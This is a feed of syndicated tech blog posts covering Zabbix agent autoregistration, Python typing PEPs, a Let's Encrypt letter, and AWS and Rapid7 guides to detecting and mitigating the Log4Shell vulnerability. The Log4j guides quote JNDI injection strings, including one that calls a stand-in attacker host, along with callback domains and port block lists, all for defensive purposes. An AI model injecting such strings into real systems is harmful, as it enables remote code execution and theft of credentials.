Handy Tips #16: Automating Zabbix host deployment with autoregistration

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/handy-tips-16-automating-zabbix-host-deployment-with-autoregistration/18232/

Configure Zabbix agent autoregistration to automatically deploy and start monitoring Zabbix agent hosts.

As your IT infrastructure scales up, there comes a point where manual host creation is simply not feasible. At this point, the preferable approach is to find a way to automate host deployment.

Deploy and manage hosts automatically with Zabbix active agent autoregistration:

  • Automatically deploy and start monitoring hosts
  • Assign different templates depending on hostname and host metadata
  • Receive notifications whenever a new host is deployed
  • Automatically make changes or perform offboarding of hosts

Check out the video to learn how to configure Zabbix agent autoregistration.

How to configure Zabbix agent autoregistration:


  1. Navigate to Configuration → Actions → Autoregistration actions
  2. Click the Create action button
  3. Define action conditions
  4. Navigate to the Operations tab and define the action operations
  5. Connect to your host and open the Zabbix agent configuration file
  6. Populate the Hostname, HostMetadata and HostInterface fields
  7. Restart the Zabbix agent
  8. Navigate to Configuration → Hosts and make sure that the host has been created
  9. Navigate to Monitoring → Latest Data and make sure that the host is receiving metrics

Tips and best practices:
  • Host name and host metadata values are case-sensitive
  • Agent restart is required to apply host name and host metadata changes
  • HostnameItem can be used to populate the host name with a Zabbix agent item value
  • HostMetadataItem can be used to populate the host metadata with a Zabbix agent item value
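
For reference, below is a minimal zabbix_agentd.conf sketch covering step 6 above; the server address, hostname, metadata string, and interface value are placeholders you would replace with your own (the 192.0.2.x addresses are documentation examples):

# Example values only; replace with your Zabbix server/proxy address and host details
Server=192.0.2.10
ServerActive=192.0.2.10
Hostname=web-server-01
HostMetadata=Linux nginx production
HostInterface=192.0.2.25

An autoregistration action can then match on the hostname or on substrings of the HostMetadata value (for example, "nginx" or "production") to link the appropriate templates and host groups.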

[$] Wrangling the typing PEPs

Post Syndicated from original https://lwn.net/Articles/878675/rss

When last we looked in on the great typing PEP debate for Python, back in August, two PEPs were still being discussed as alternatives for handling annotations in the language. The steering council was considering the issue after deferring on a decision for the Python 3.10 release, but the question has been deferred again for Python 3.11. More study is needed and the council is looking for help from the Python community to guide its decision. In the meantime, though, discussion about the deferral has led to the understanding that annotations are not a general-purpose feature, but are only meant for typing information. In addition, there is a growing realization that typing information is effectively becoming mandatory for Python libraries.

A Year-End Letter from our Executive Director

Post Syndicated from Let's Encrypt original https://letsencrypt.org/2021/12/16/ed-letter-2021.html

This letter was originally published in our 2021 annual report.

We can do a lot to improve security and privacy on the Internet by taking existing ideas and applying them in ways that benefit the general public at scale. Our work certainly does involve some research, as our name implies, but the success that we’ve had in pursuing our mission largely comes from our ability to go from ideas to implementations that improve the lives of billions of people around the world.

Our first major project, Let’s Encrypt, now helps to protect more than 260 million websites by offering free and fully automated TLS certificate issuance and management. Since it launched in 2015, encrypted page loads have gone from under 40% to 92% in the U.S. and 83% globally.

We didn’t invent certificate authorities. We didn’t invent automated issuance and management. We refined those ideas and applied them in ways that benefit the general public at scale.

We launched our Prossimo project in late 2020. Our hope is that this project will greatly improve security and privacy on the Internet by making memory safety vulnerabilities in the Internet’s most critical software a thing of the past. We’re bringing a healthy dose of ambition to the table and we’re backing it up with effective strategies and strong partnerships.

Again, we didn’t invent any memory safe languages or techniques, and we certainly didn’t invent memory safety itself. We’re simply taking existing ideas and applying them in ways that benefit the general public at scale. We’re getting the work done.

With our latest project, Divvi Up for Privacy Preserving Metrics (PPM), the core ideas are a bit newer than the ideas behind our other projects, but we didn’t invent them either. Over the past decade or so some bright people have come up with a way to resolve the tension between wanting to collect metrics about populations and needing to collect data about individuals.

We believe those ideas have matured enough that it’s time to deploy them to the public’s benefit. We started by building and deploying a PPM service for Covid-19 Exposure Notification applications in late 2020, in partnership with Apple, Google, the Bill & Melinda Gates Foundation and the Linux Foundation. We’re expanding that service so any application can collect metrics in a privacy-preserving way.

Being ready to bring ideas to life means a few different things.

We need to have an excellent engineering team that knows how to build services at scale. It’s not enough to just build something that works – the quality and reliability of our work needs to inspire confidence. People need to be able to rely on us.

We also need to have the experience, perspective, and capacity to effectively consider ideas. We are not an organization that “throws things at the wall to see what sticks.” Between our staff, our board of directors, our partners, and our community, we’re able to do a great job evaluating opportunities to understand technical feasibility, potential impact, and alignment with our public benefit mission—to reduce financial, technological, and educational barriers to secure communication over the Internet.

Administrative and communications capabilities are essential. From fundraising and accounting to legal and social media, our administrative teams exist in order to support and amplify the critical work that we do. We’re proud to run a financially efficient organization that provides services for billions of people on only a few million dollars each year.

Finally, it means having the financial resources we need to function. As a nonprofit, 100% of our funding comes from charitable contributions from people like you and organizations around the world. But global impact doesn’t necessarily require million dollar checks: since 2015 tens of thousands of people have given to our work. They’ve made a case for corporate sponsorship, given through their DAFs, or set up recurring donations, sometimes to give $3 a month. That’s all added up to $17M that we’ve used to change the Internet for nearly everyone using it. I hope you’ll join these people and support us financially if you can.

Using AWS security services to protect against, detect, and respond to the Log4j vulnerability

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/using-aws-security-services-to-protect-against-detect-and-respond-to-the-log4j-vulnerability/

January 7, 2022: The blog post has been updated to include using Network ACL rules to block potential log4j-related outbound traffic.

January 4, 2022: The blog post has been updated to suggest using WAF rules when correct HTTP Host Header FQDN value is not provided in the request.

December 31, 2021: We made a minor update to the second paragraph in the Amazon Route 53 Resolver DNS Firewall section.

December 29, 2021: A paragraph under the Detect section has been added to provide guidance on validating if log4j exists in an environment.

December 23, 2021: The GuardDuty section has been updated to describe new threat labels added to specific finding to give log4j context.

December 21, 2021: The post includes more info about Route 53 Resolver DNS query logging.

December 20, 2021: The post has been updated to include Amazon Route 53 Resolver DNS Firewall info.

December 17, 2021: The post has been updated to include using Athena to query VPC flow logs.

December 16, 2021: The Respond section of the post has been updated to include IMDSv2 and container mitigation info.

This blog post was first published on December 15, 2021.


Overview

In this post we will provide guidance to help customers who are responding to the recently disclosed log4j vulnerability. This covers what you can do to limit the risk of the vulnerability, how you can try to identify if you are susceptible to the issue, and then what you can do to update your infrastructure with the appropriate patches.

The log4j vulnerability (CVE-2021-44228, CVE-2021-45046) is a critical vulnerability (CVSS 3.1 base score of 10.0) in the ubiquitous logging platform Apache Log4j. This vulnerability allows an attacker to perform a remote code execution on the vulnerable platform. Version 2 of log4j, between versions 2.0-beta-9 and 2.15.0, is affected.

The vulnerability uses the Java Naming and Directory Interface (JNDI), which is used by a Java program to find data, typically through a directory, commonly an LDAP directory in the case of this vulnerability.

Figure 1, below, highlights the log4j JNDI attack flow.


Figure 1. Log4j attack progression. Source: GovCERT.ch, the Computer Emergency Response Team (GovCERT) of the Swiss government

As an immediate response, follow this blog and use the tool designed to hotpatch a running JVM using any log4j 2.0+. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Protect

You can use multiple AWS services to help limit your risk/exposure from the log4j vulnerability. You can build a layered control approach, and/or pick and choose the controls identified below to help limit your exposure.

AWS WAF

Use AWS Web Application Firewall, following AWS Managed Rules for AWS WAF, to help protect your Amazon CloudFront distribution, Amazon API Gateway REST API, Application Load Balancer, or AWS AppSync GraphQL API resources.

  • AWSManagedRulesKnownBadInputsRuleSet esp. the Log4JRCE rule which helps inspect the request for the presence of the Log4j vulnerability. Example patterns include ${jndi:ldap://example.com/}.
  • AWSManagedRulesAnonymousIpList esp. the AnonymousIPList rule which helps inspect IP addresses of sources known to anonymize client information.
  • AWSManagedRulesCommonRuleSet, esp. the SizeRestrictions_BODY rule to verify that the request body size is at most 8 KB (8,192 bytes).

You should also consider implementing WAF rules that deny access if the correct HTTP Host Header FQDN value is not provided in the request. This can help reduce the likelihood of scanners that are scanning the internet IP address space reaching your resources protected by WAF via a request with an incorrect Host Header, like an IP address instead of an FQDN. It’s also possible to use custom Application Load Balancer listener rules to achieve this.

If you’re using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions.

Have multiple accounts? Follow these instructions to use AWS Firewall Manager to deploy AWS WAF rules centrally across your AWS organization.

Amazon Route 53 Resolver DNS Firewall

You can use Route 53 Resolver DNS Firewall, following AWS Managed Domain Lists, to help proactively protect resources with outbound public DNS resolution. We recommend associating Route 53 Resolver DNS Firewall with a rule configured to block domains on the AWSManagedDomainsMalwareDomainList, which has been updated in all supported AWS regions with domains identified as hosting malware used in conjunction with the log4j vulnerability. AWS will continue to deliver domain updates for Route 53 Resolver DNS Firewall through this list.

Also, you should consider blocking outbound port 53 to prevent the use of external untrusted DNS servers. This helps force all DNS queries through DNS Firewall and ensures DNS traffic is visible for GuardDuty inspection. It may also help to use DNS Firewall to block DNS resolution of certain country code top-level domains (ccTLDs) that your VPC resources have no legitimate reason to connect out to. Examples of ccTLDs you may want to block may be included in the known log4j callback domains IOCs.

We also recommend that you enable DNS query logging, which allows you to identify and audit potentially impacted resources within your VPC, by inspecting the DNS logs for the presence of blocked outbound queries due to the log4j vulnerability, or to other known malicious destinations. DNS query logging is also useful in helping identify EC2 instances vulnerable to log4j that are responding to active log4j scans, which may be originating from malicious actors or from legitimate security researchers. In either case, instances responding to these scans potentially have the log4j vulnerability and should be addressed. GreyNoise is monitoring for log4j scans and sharing the callback domains here. Some notable domains customers may want to examine log activity for, but not necessarily block, are: *interact.sh, *leakix.net, *canarytokens.com, *dnslog.cn, *.dnsbin.net, and *cyberwar.nl. It is very likely that instances resolving these domains are vulnerable to log4j.

AWS Network Firewall

Customers can use Suricata-compatible IDS/IPS rules in AWS Network Firewall to deploy network-based detection and protection. While Suricata doesn’t have a protocol detector for LDAP, it is possible to detect these LDAP calls with Suricata. Open-source Suricata rules addressing Log4j are available from Corelight, NCC Group, ET Labs, and CrowdStrike. These rules can help identify scanning, as well as post-exploitation of the log4j vulnerability. Because there is a large amount of benign scanning happening now, we recommend customers focus their time first on potential post-exploitation activities, such as outbound LDAP traffic from their VPC to untrusted internet destinations.

We also recommend customers consider implementing outbound port/protocol enforcement rules that monitor or prevent instances of protocols like LDAP from using non-standard LDAP ports such as 53, 80, 123, and 443. Monitoring or preventing usage of port 1389 outbound may be particularly helpful in identifying systems that have been triggered by internet scanners to make command and control calls outbound. We also recommend that systems without a legitimate business need to initiate network calls out to the internet not be given that ability by default. Outbound network traffic filtering and monitoring is not only very helpful with log4j, but with identifying other classes of vulnerabilities too.
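
As a simple illustration (not one of the vendor rule sets referenced above), a Suricata-compatible rule that alerts on outbound traffic to port 1389 might look like the following; the SID, message text, and port are placeholders to adapt to your environment, and in AWS Network Firewall a rule like this would be added to a Suricata-compatible stateful rule group:

alert tcp $HOME_NET any -> $EXTERNAL_NET 1389 (msg:"Possible Log4j LDAP callback on port 1389"; sid:1000001; rev:1;)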

Network Access Control Lists

Customers may be able to use Network Access Control List (NACL) rules to block some of the known log4j-related outbound ports to help limit further compromise of successfully exploited systems. We recommend customers consider blocking ports 1389, 1388, 1234, 12344, 9999, 8085, and 1343 outbound. As NACLs block traffic at the subnet level, careful consideration should be given to ensure any new rules do not block legitimate communications using these outbound ports across internal subnets. Blocking ports 389 and 88 outbound can also be helpful in mitigating log4j, but those ports are commonly used for legitimate applications, especially in a Windows Active Directory environment. See the VPC flow logs section below to get details on how you can validate any ports being considered.
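
As an illustration, a deny rule for one of these ports could be added with the AWS CLI as shown below; the network ACL ID, rule number, and CIDR range are placeholders, and you would repeat the command with distinct rule numbers for each port you decide to block:

aws ec2 create-network-acl-entry \
    --network-acl-id acl-0123456789abcdef0 \
    --rule-number 110 \
    --protocol tcp \
    --port-range From=1389,To=1389 \
    --egress \
    --cidr-block 0.0.0.0/0 \
    --rule-action deny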

Use IMDSv2

Through the early days of the log4j vulnerability, researchers have noted that, once a host has been compromised with the initial JNDI vulnerability, attackers sometimes try to harvest credentials from the host and send those out via some mechanism such as LDAP, HTTP, or DNS lookups. We recommend customers use IAM roles instead of long-term access keys, and not store sensitive information such as credentials in environment variables. Customers can also leverage AWS Secrets Manager to store and automatically rotate database credentials instead of storing long-term database credentials in a host’s environment variables. See prescriptive guidance here and here on how to implement Secrets Manager in your environment.

To help guard against such attacks in AWS when EC2 Roles may be in use — and to help keep all IMDS data private for that matter — customers should consider requiring the use of Instance MetaData Service version 2 (IMDSv2). Since IMDSv2 is enabled by default, you can require its use by disabling IMDSv1 (which is also enabled by default). With IMDSv2, requests are protected by an initial interaction in which the calling process must first obtain a session token with an HTTP PUT, and subsequent requests must contain the token in an HTTP header. This makes it much more difficult for attackers to harvest credentials or any other data from the IMDS. For more information about using IMDSv2, please refer to this blog and documentation. While all recent AWS SDKs and tools support IMDSv2, as with any potentially non-backwards compatible change, test this change on representative systems before deploying it broadly.
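
For an existing instance, requiring IMDSv2 (and thereby disabling IMDSv1) can be done with a call such as the following; the instance ID is a placeholder:

aws ec2 modify-instance-metadata-options \
    --instance-id i-0123456789abcdef0 \
    --http-tokens required \
    --http-endpoint enabled

New instances can be launched with the same settings via the --metadata-options flag of run-instances or through launch templates.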

Detect

This post has covered how to potentially limit the ability to exploit this vulnerability. Next, we’ll shift our focus to which AWS services can help to detect whether this vulnerability exists in your environment.

Figure 2. Log4j finding in the Inspector console


Amazon Inspector

As shown in Figure 2, the Amazon Inspector team has created coverage for identifying the existence of this vulnerability in your Amazon EC2 instances and Amazon Elastic Container Registry (Amazon ECR) images. With the new Amazon Inspector, scanning is automated and continual. Continual scanning is driven by events such as new software packages, new instances, and new common vulnerabilities and exposures (CVEs) being published.

For example, once the Inspector team added support for the log4j vulnerability (CVE-2021-44228 & CVE-2021-45046), Inspector immediately began looking for this vulnerability for all supported AWS Systems Manager managed instances where Log4j was installed via OS package managers and where this package was present in Maven-compatible Amazon ECR container images. If this vulnerability is present, findings will begin appearing without any manual action. If you are using Inspector Classic, you will need to ensure you are running an assessment against all of your Amazon EC2 instances. You can follow this documentation to ensure you are creating an assessment target for all of your Amazon EC2 instances. Here are further details on container scanning updates in Amazon ECR private registries.

GuardDuty

In addition to finding the presence of this vulnerability through Inspector, the Amazon GuardDuty team has also begun adding indicators of compromise associated with exploiting the Log4j vulnerability, and will continue to do so. GuardDuty will monitor for attempts to reach known-bad IP addresses or DNS entries, and can also find post-exploit activity through anomaly-based behavioral findings. For example, if an Amazon EC2 instance starts communicating on unusual ports, GuardDuty would detect this activity and create the finding Behavior:EC2/NetworkPortUnusual. This activity is not limited to the NetworkPortUnusual finding, though. GuardDuty has a number of different findings associated with post exploit activity, such as credential compromise, that might be seen in response to a compromised AWS resource. For a list of GuardDuty findings, please refer to this GuardDuty documentation.

To further help you identify and prioritize issues related to CVE-2021-44228 and CVE-2021-45046, the GuardDuty team has added threat labels to the finding detail for the following finding types:

Backdoor:EC2/C&CActivity.B
If the IP queried is Log4j-related, then fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Backdoor:EC2/C&CActivity.B!DNS
If the domain name queried is Log4j-related, then the fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Behavior:EC2/NetworkPortUnusual
If the EC2 instance communicated on port 389 or port 1389, then the associated finding severity will be modified to High, and the finding fields will include the following value:

  • service.additionalInfo.context = Possible Log4j callback

Figure 3. GuardDuty finding with log4j threat labels

Security Hub

Many customers today also use AWS Security Hub with Inspector and GuardDuty to aggregate alerts and enable automatic remediation and response. In the short term, we recommend that you use Security Hub to set up alerting through AWS Chatbot, Amazon Simple Notification Service, or a ticketing system for visibility when Inspector finds this vulnerability in your environment. In the long term, we recommend you use Security Hub to enable automatic remediation and response for security alerts when appropriate. Here are ideas on how to set up automatic remediation and response with Security Hub.

VPC flow logs

Customers can use Athena or CloudWatch Logs Insights queries against their VPC flow logs to help identify VPC resources associated with log4j post exploitation outbound network activity. Version 5 of VPC flow logs is particularly useful, because it includes the “flow-direction” field. We recommend customers start by paying special attention to outbound network calls using destination port 1389 since outbound usage of that port is less common in legitimate applications. Customers should also investigate outbound network calls using destination ports 1388, 1234, 12344, 9999, 8085, 1343, 389, and 88 to untrusted internet destination IP addresses. Free-tier IP reputation services, such as VirusTotal, GreyNoise, NOC.org, and ipinfo.io, can provide helpful insights related to public IP addresses found in the logged activity.

Note: If you have a Microsoft Active Directory environment in the captured VPC flow logs being queried, you might see false positives due to its use of port 389.
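
As a starting point, the following is a hedged example of an Athena query over version 5 VPC flow logs; the table name vpc_flow_logs and the column names assume a table created with fields matching the version 5 log format, so adjust them to your own schema and add partition filters as appropriate:

SELECT srcaddr, dstaddr, dstport, count(*) AS flow_count
FROM vpc_flow_logs
WHERE flow_direction = 'egress'
  AND dstport IN (1389, 1388, 1234, 12344, 9999, 8085, 1343, 389, 88)
  AND "action" = 'ACCEPT'
GROUP BY srcaddr, dstaddr, dstport
ORDER BY flow_count DESC;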

Validation with open-source tools

With the evolving nature of the different log4j vulnerabilities, it’s important to validate that upgrades, patches, and mitigations in your environment are indeed working to mitigate potential exploitation of the log4j vulnerability. You can use open-source tools, such as aws_public_ips, to get a list of all your current public IP addresses for an AWS Account, and then actively scan those IPs with log4j-scan using a DNS Canary Token to get notification of which systems still have the log4j vulnerability and can be exploited. We recommend that you run this scan periodically over the next few weeks to validate that any mitigations are still in place, and no new systems are vulnerable to the log4j issue.

Respond

The first two sections have discussed ways to help prevent potential exploitation attempts, and how to detect the presence of the vulnerability and potential exploitation attempts. In this section, we will focus on steps that you can take to mitigate this vulnerability. As we noted in the overview, the immediate response recommended is to follow this blog and use the tool designed to hotpatch a running JVM using any log4j 2.0+. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Figure 4. Systems Manager Patch Manager patch baseline approving critical patches immediately


AWS Patch Manager

If you use AWS Systems Manager Patch Manager, and you have critical patches set to install immediately in your patch baseline, your EC2 instances will already have the patch. It is important to note that you’re not done at this point. Next, you will need to update the class path wherever the library is used in your application code, to ensure you are using the most up-to-date version. You can use AWS Patch Manager to patch managed nodes in a hybrid environment. See here for further implementation details.

Container mitigation

To install the hotpatch noted in the overview onto EKS cluster worker nodes, AWS has developed an RPM that performs a JVM-level hotpatch which disables JNDI lookups from the log4j2 library. The Apache Log4j2 node agent is an open-source project built by the Kubernetes team at AWS. To learn more about how to install this node agent, please visit this GitHub page.

Once identified, ECR container images will need to be updated to use the patched log4j version. Downstream, you will need to ensure that any containers built with a vulnerable ECR container image are updated to use the new image as soon as possible. This can vary depending on the service you are using to deploy these images. For example, if you are using Amazon Elastic Container Service (Amazon ECS), you might want to update the service to force a new deployment, which will pull down the image using the new log4j version. Check the documentation that supports the method you use to deploy containers.
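
For the Amazon ECS example above, forcing a new deployment after the updated image has been pushed can be done with a command like the following; the cluster and service names are placeholders:

aws ecs update-service \
    --cluster my-cluster \
    --service my-java-service \
    --force-new-deployment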

If you’re running Java-based applications on Windows containers, follow Microsoft’s guidance here.

We recommend you vend new application credentials and revoke existing credentials immediately after patching.

Mitigation strategies if you can’t upgrade

In case you either can’t upgrade to a patched version, which disables access to JNDI by default, or if you are still determining your strategy for how you are going to patch your environment, you can mitigate this vulnerability by changing your log4j configuration. To implement this mitigation in releases >=2.10, you will need to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

For a more comprehensive list about mitigation steps for specific versions, refer to the Apache website.

Conclusion

In this blog post, we outlined key AWS security services that enable you to adopt a layered approach to help protect against, detect, and respond to your risk from the log4j vulnerability. We urge you to continue to monitor our security bulletins; we will continue updating our bulletins with our remediation efforts for our side of the shared-responsibility model.

Given the criticality of this vulnerability, we urge you to pay close attention to the vulnerability, and appropriately prioritize implementing the controls highlighted in this blog.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Syed Shareef

Syed is a Senior Security Solutions Architect at AWS. He works with large financial institutions to help them achieve their business goals with AWS, whilst being compliant with regulatory and security requirements.

The Everyperson’s Guide to Log4Shell (CVE-2021-44228)

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/


If you work in security, the chances are that you have spent the last several days urgently responding to the Log4Shell vulnerability (CVE-2021-44228), investigating where you have instances of Log4j in your environment, and questioning your vendors about their response. You have likely already read up on the implications and steps that need to be taken. This blog is for everyone else who wants to understand what’s going on and why the internet seems to be on fire again. And for you security professionals, we’ve also included some questions on the broader implications and long term view. You know, for all that spare time you have right now.

What is Log4Shell?

Log4Shell — also known as CVE-2021-44228 — is a critical vulnerability that enables remote code execution in systems using the Apache Foundation’s Log4j, which is an open-source Java library that is extensively used in commercial and open-source software products and utilities. For a more in-depth technical assessment of Log4Shell check out Rapid7’s AttackerKB analysis.

What is Log4j?

Log4j is one of the most common tools for sending text to be stored in log files and/or databases. It is used in millions of applications and websites in every organization all across the internet. For example, information is sent to keep track of website visitors, note when warnings or errors occur in processing, and help support teams triage problems.


So what’s the problem?

It turns out that Log4j doesn’t just log plain strings. Text strings that are formatted a certain way will be executed just like a line from a computer program. The problem is that this allows malicious actors to manipulate computers all over the internet into taking actions against the computer owners’ wishes or without their permission. Cyberattackers can use this to steal information, force actions, or extort the computer owners or operators.
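
To make the mechanics concrete, here is a hypothetical Java sketch of how attacker-controlled input reaches Log4j; the class and method names are illustrative, and the malicious string in the comment is the widely published lookup pattern:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginController {
    private static final Logger logger = LogManager.getLogger(LoginController.class);

    public void recordFailedLogin(String username) {
        // With vulnerable Log4j 2.x versions, if username contains a lookup such as
        // ${jndi:ldap://attacker.example/a}, the logging call below resolves it,
        // contacts the attacker-controlled server, and can load and run remote code.
        logger.warn("Failed login attempt for user: {}", username);
    }
}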

This vulnerability is what we’re referring to as Log4Shell, or CVE-2021-44228. Log4j is the vulnerable technology. As this is a highly evolving situation, you can always head over to our main live blog on Log4Shell.

Is it really that big of a deal?

In a word, yes.

Caitlin Kiska, an information security engineer at Cardinal Health, put it this way: “Imagine there is a specific kind of bolt used in most of the cars and car parts in the world, and they just said that bolt needs to be replaced.” Glenn Thorpe, Rapid7’s Emergent Threat Response Manager added, “… and the presence of that bolt allows anyone to just take over the car.”

The first issue is Log4j’s widespread use. This little tool is used in countless systems across the internet, which makes remediation or mitigation of this into a huge task — and makes it more likely something might get missed.

The second issue is that attackers can use it in a variety of ways, so the sky is sort of the limit for them.

Perhaps the biggest concern of all is that it’s actually pretty easy to use the vulnerability for malicious purposes. Remote code execution vulnerabilities are always concerning, but you hope that they will be complicated to exploit and require specialist technical skill, limiting who can take advantage of them and slowing down the pace of attacks so that defenders can ideally take remediation action first. That’s not the case with Log4Shell. The Log4j tool is designed to send whatever data is inputted in the right format, so as long as attackers know how to form their commands into that format (which is not a secret), they can take advantage of this bug, and they currently are doing just that.

That sounds pretty bad. Is the situation hopeless?

Definitely not. The good news is that the Apache Foundation has updated Log4j to address the vulnerability. All organizations urgently need to check for the presence of this vulnerability in their environment and update affected systems to the latest patched version.

The first update — version 2.15.0 — was released on December 6, 2021. As exploitation ramped up in the wild, it became clear that the update did not fully remediate the issue in all use cases, a vulnerability that the National Vulnerability Database (NVD) codified as CVE-2021-45046.

As a result, on December 13, the Apache Foundation released version 2.16.0, which completely removes support for message lookup patterns, thus slamming the door on JNDI functionality and possibly adding to development team backlogs to update material sections of their codebase that handle logging.

That sounds straightforward, right?

Unfortunately, it’s likely going to be a pretty huge undertaking and likely require different phases of discovery and remediation/mitigation.

Remediation

The first course of action is to identify all vulnerable applications, which can be a mix of vendor-supplied solutions and in-house developed applications. NCSC NL is maintaining a list of impacted software, but organizations are encouraged to monitor vendor advisories and releases directly for the most up-to-date information.

For in-house developed applications, organizations — at a minimum — need to update their Log4j libraries to the latest version (which, as of 2021-12-14, is 2.16) and apply the mitigations described in Rapid7’s initial blog post on CVE-2021-44228, which includes adding a parameter to all Java startup scripts and strongly encourages updating Java virtual machine installations to the latest, safest versions. An additional resource, published by the Apache Security Team, provides a curated list of all affected Apache projects, which can be helpful to expedite identification and discovery.

If teams are performing “remote” checks (i.e., exploiting the vulnerability remotely as an attacker would) versus local filesystem “authenticated” checks, the remote checks should be done both by IP address and by fully qualified domain name/virtual host name, as there may be different routing rules in play that scanning by IP address alone will not catch.

These mitigations must happen everywhere there is a vulnerable instance of Log4j. Do not assume that the issue applies only to internet-facing systems or live-running systems. There may be batch jobs that run hourly, daily, weekly, monthly, etc., on stored data that may contain exploit strings that could trigger execution.

Forensics

Attacks have been active since at least December 1, 2021, and there is evidence this weakness has been known about since at least March of 2021. Therefore, it is quite prudent to adopt an “assume breach” mindset. NCSC NL has a great resource page on ways you can detect exploitation attempts from application log files. Please be aware that this is not just a web-based attack. Initial, quite public, exploit showcases included changing the name of iOS devices and Tesla cars. Both those companies regularly pull metadata from their respective devices, and it seems those strings were passed to Log4j handlers somewhere in the processing chain. You should review logs from all internet-facing systems, as well as anywhere Log4j processing occurs.

Exploitation attempts will generally rely on pulling external resources in (as is the case with any attack after gaining initial access), so behavioral detections may have already caught or stopped some attacks. The Log4j weakness allows for rather clever data exfiltration paths, especially DNS. Attackers are pulling values from environment variables and files with known filesystem paths and creating dynamic domain names from them. That means organizations should review DNS query logs going as far back as possible. Note: This could take quite a bit of time and effort, but it must be done to ensure you’re not already a victim.

Proactive response

Out of an abundance of caution, organizations should also consider re-numbering critical IP segments (where Log4j lived), changing host names on critical systems (where Log4j lived), and resetting credentials — especially those associated with Amazon AWS and other cloud providers — in the event they have already been exfiltrated.

Who should be paying attention to this?

Pretty much every organization, regardless of size, sector, or geography. If you have any kind of web presence or internet connectivity, you need to pay attention and check your status. If you outsource all the technical aspects of your business, ask your vendors what they are doing about this issue.

Who is exploiting it and how?

Kind of… everyone.

“Benign” researchers (some independent, some part of cybersecurity firms) are using the exploit to gain an initial understanding of the base internet-facing attack surface.

Cyberattackers are also very active and are racing to take advantage of this vulnerability before organizations can get their patches in place. Botnets, such as Mirai, have been adapted to use the exploit code to both exfiltrate sensitive data and gain initial access to systems (some deep within organizations).

Ransomware groups have already sprung into action and weaponized the Log4j weakness to compromise organizations. Rapid7’s Project Heisenberg is collecting and publishing samples of all the unique attempts seen since December 11, 2021.

How are things likely to develop?

These initial campaigns are only the beginning. Sophisticated attacks from more serious and capable groups will appear over the coming days, weeks, and months, and they’ll likely focus on more enterprise-grade software that is known to be vulnerable.

Most of the initial attack attempts are via website-focused injection points (input fields, search boxes, headers, etc.). There will be more advanced campaigns that hit API endpoints (even “hidden” APIs that are part of company mobile apps) and try to find sneaky ways to get exploit strings past gate guards (like the iOS device renaming example).

Even organizations that have remediated deployed applications might miss some virtual machine or container images that get spun up regularly or infrequently. The Log4Shell attacks are easily automatable, and we’ll be seeing them as regularly as we see WannaCry and Conficker (yes, we still see quite a few exploits on the regular for those vulnerabilities).

Do we need to worry about similar vulnerabilities in other systems?

In the immediate term, security teams should narrow their attention to identify systems with the affected Log4j packages.

For the longer term, while it is impossible to forecast identification of similar vulnerabilities, we do know the ease and prevalence of CVE-2021-44228 demands the continued attention (been a long weekend for many) of security, infrastructure, and application teams.

Along with Log4Shell, we also have CVE-2021-4104 — reported on December 9, 2021 — a flaw in the Java logging library Apache Log4j version 1.x, whose JMSAppender is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and the attacker’s JMS Broker. Note this flaw only affects applications that are specifically configured to use JMSAppender, which is not the default, or when the attacker has write access to the Log4j configuration for adding JMSAppender pointed at the attacker’s JMS Broker.

Exploit vectors of Log4Shell and mitigations reported on Friday continue to evolve as reported by our partners at Snyk.io and Java Champion, Brian Vermeer — see “Editor’s note (Dec. 13, 2021)” — therefore, continued vigilance on this near and present threat is time well spent. Postmortem exercises (and there will be many) should absolutely include efforts to evolve software, open-source, and package dependency inventories and, given current impacts, better model threats from packages with similar uninspected lookup behavior.

Does this issue indicate that we should stop compiling systems and go back to building from scratch?

There definitely has been chatter regarding the reliance upon so many third-party dependencies in all areas of software development. We’ve seen many attempts at poisoning numerous ecosystems this year, everything from Python to JavaScript, and now we have a critical vulnerability in a near-ubiquitous component.

On one hand, there is merit in relying solely on code you develop in-house, built on the core features in your programming language of choice. You can make an argument that this would make attackers’ lives harder and reduce the bang they get for their buck.

However, it seems a bit daft to fully forego the volumes of pre-built, feature-rich, and highly useful components. And let’s not forget that not all software is created equally. The ideal is that community built and shared software will benefit from many more hands to the pump, more critical eyes, and a longer period to mature.

The lesson from the Log4Shell weakness seems pretty clear: Use, but verify, and support! Libraries such as Log4j benefit from wide community adoption, since they gain great features that can be harnessed quickly and effectively. However, you cannot just assume that all is and will be well in any given ecosystem, and you absolutely need to be part of the community vetting change and feature requests. If more eyes were on the initial request to add this fairly crazy feature (dynamic message execution) and more security-savvy folks were in the approval stream, you would very likely not be reading this post right now (and it’d be one of the most boring Marvel “What If…?” episodes ever).

Organizations should pull up a seat to the table, offer code creation and review support, and consider funding projects that become foundational or ubiquitous components in your application development environment.

How would a Software Bill of Materials (SBOM) have impacted this issue?

A Bill of Materials is an inventory, by definition, and conceptually should contribute to speeding the discovery timeline during emergent vulnerability response exercises, such as the Log4j incident we are communally involved in now.

An SBOM is intended to be a formal record that contains the details and supply chain relationships of various components used in software, kind of like an ingredients list for technology. In this case, those components would include Java libraries used for logging (e.g., Log4j2).

SBOM requirements were included in the US Executive Order issued in May 2021. While there may be international variations, the concept and intended objectives are uniform. For that reason, I will reference US progress for simplicity.

From: The Minimum Elements For a Software Bill of Materials (SBOM), issued by the Department of Commerce, in coordination with the National Telecommunications and Information Administration (NTIA), Jul 12, 2021


